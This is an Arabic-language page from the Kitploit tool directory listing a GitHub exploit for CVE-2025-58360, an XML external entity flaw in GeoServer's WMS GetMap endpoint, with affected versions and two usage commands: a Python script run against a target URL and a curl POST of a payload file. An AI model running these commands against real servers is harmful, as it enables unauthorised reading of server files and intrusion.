Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58360 — XXE من خلال نقطة نهاية محددة /geoserver/wms عملية GetMap - Geoserver | Kitploit
أدوات/GitHubGitHub/quyenheu/cve-2025-58360
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubquyenheu/cve-2025-58360

CVE-2025-58360

XXE من خلال نقطة نهاية محددة /geoserver/wms عملية GetMap - Geoserver

عرض المستودع
63منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58360

من الإصدار 2.26.0 إلى ما قبل 2.26.2 وقبل 2.25.6، تم تحديد ثغرة في الكيان الخارجي لـ XML (XXE). يقبل التطبيق إدخال XML من خلال نقطة نهاية محددة /geoserver/wms لعملية GetMap

image

استغلال1:

root@kitploit:~
python3 CVE-2025-58360 -u http://example.com

استغلال2:

root@kitploit:~
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png
تنزيل الأداة